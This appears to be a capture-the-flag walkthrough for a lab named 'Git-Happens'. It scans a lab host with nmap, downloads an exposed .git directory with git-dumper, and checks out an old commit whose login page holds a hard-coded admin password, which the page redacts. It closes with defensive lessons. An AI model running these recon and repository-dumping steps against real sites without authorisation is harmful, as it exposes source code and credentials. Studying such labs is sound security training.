Git-Happens

Target Details

IP Address: 10.10.49.172

Scan Services

  • Run nmap scan

$ nmap -sCV -Pn -oN nmap.txt [TARGET_IP]
$ cat nmap.txt
Nmap scan report for [TARGET_IP]
Host is up (0.40s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-title: Super Awesome Site!
|_http-server-header: nginx/1.14.0 (Ubuntu)
| http-git: 
|   [TARGET_IP]:80/.git/
|     Git repository found!
|_    Repository description: Unnamed repository; edit this file 'description' to name the...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Apr 14 22:04:47 2023 -- 1 IP address (1 host up) scanned in 118.95 seconds

  • Services

Service
PORT
Comments

HTTP

80

exposed .git directory with listing enabled

Clone git directory to local machine

  • Install git-dumper python tool

pip install git-dumper

  • Create directory for repo and change dir

mdkir git-repo && cd git-repo

  • Download git files

$ git-dumper http://10.10.49.172/.git/ .
[-] Testing http://10.10.49.172/.git/HEAD [200]
[-] Testing http://10.10.49.172/.git/ [200]
[-] Fetching .git recursively
[-] Fetching http://10.10.49.172/.git/ [200]
[-] Fetching http://10.10.49.172/.gitignore [404]
[-] http://10.10.49.172/.gitignore responded with status code 404
[-] Fetching http://10.10.49.172/.git/description [200]
[-] Fetching http://10.10.49.172/.git/index [200]
[-] Fetching http://10.10.49.172/.git/hooks/ [200]
[-] Fetching http://10.10.49.172/.git/refs/ [200]
[-] Fetching http://10.10.49.172/.git/config [200]
[-] Fetching http://10.10.49.172/.git/branches/ [200]
[-] Fetching http://10.10.49.172/.git/HEAD [200]
....
[-] Fetching http://10.10.49.172/.git/logs/refs/heads/master [200]
[-] Running git checkout .
Updated 7 paths from the index

Looking Through commits

  • Check commit logs

$ git log
commit d0b3578a628889f38c0affb1b75457146a4678e5 (HEAD -> master, tag: v1.0)
Author: Adam Bertrand <hydragyrum@gmail.com>
Date:   Thu Jul 23 22:22:16 2020 +0000

    Update .gitlab-ci.yml

commit 77aab78e2624ec9400f9ed3f43a6f0c942eeb82d
Author: Hydragyrum <hydragyrum@gmail.com>
Date:   Fri Jul 24 00:21:25 2020 +0200

    add gitlab-ci config to build docker file.

....


commit 395e087334d613d5e423cdf8f7be27196a360459
Author: Hydragyrum <hydragyrum@gmail.com>
Date:   Thu Jul 23 23:17:43 2020 +0200

    Made the login page, boss!

commit 2f423697bf81fe5956684f66fb6fc6596a1903cc
Author: Adam Bertrand <hydragyrum@gmail.com>
Date:   Mon Jul 20 20:46:28 2020 +0000

    Initial commit

  • Found commit hash when login page was created. commit hash: 395e087334d613d5e423cdf8f7be27196a360459

  • Change git HEAD to 395e087334d613d5e423cdf8f7be27196a360459 hash

git checkout 395e087334d613d5e423cdf8f7be27196a360459

  • List directory files

$ ls
README.md      css            dashboard.html index.html

  • We might find hard coded passwords in html page.

$ cat index.html

....
    <script>
      function login() {
        let form = document.getElementById("login-form");
        console.log(form.elements);
        let username = form.elements["username"].value;
        let password = form.elements["password"].value;
        if (
          username === "admin" &&
          password === "{{REDACTED}}"
        ) {
          document.cookie = "login=1";
          window.location.href = "/dashboard.html";
        } else {
          document.getElementById("error").innerHTML =
            "INVALID USERNAME OR PASSWORD!";
        }
      }
    </script>
  </body>
</html>

  • We've found hard coded password in index.html page. Submit password as flag.

Real World Analogy

Conclusion

That was FUN!!

  • If you're gonna hard code credentials on client side, there is always someone who's gonna break the code.

  • .git directory shouldn't be accessible to anyone. A minor server misconfiguration will allow attacker to find attack vector and exploit your infra/apps.

PreviousVulnerable API AppNextKiba

Last updated

Was this helpful?